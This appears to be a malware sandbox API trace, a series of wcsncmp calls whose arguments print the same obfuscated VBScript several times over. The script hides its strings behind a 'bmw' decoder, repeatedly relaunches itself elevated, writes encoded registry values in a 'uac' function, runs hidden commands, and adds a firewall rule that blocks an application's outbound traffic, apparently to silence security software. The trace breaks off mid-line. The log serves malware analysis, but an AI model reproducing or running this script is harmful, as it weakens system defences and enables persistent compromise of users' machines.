CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.340] wcsncmp (_String1="ules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.340] wcsncmp (_String1="les = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.340] wcsncmp (_String1="es = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.340] wcsncmp (_String1="s = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.341] wcsncmp (_String1=" = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 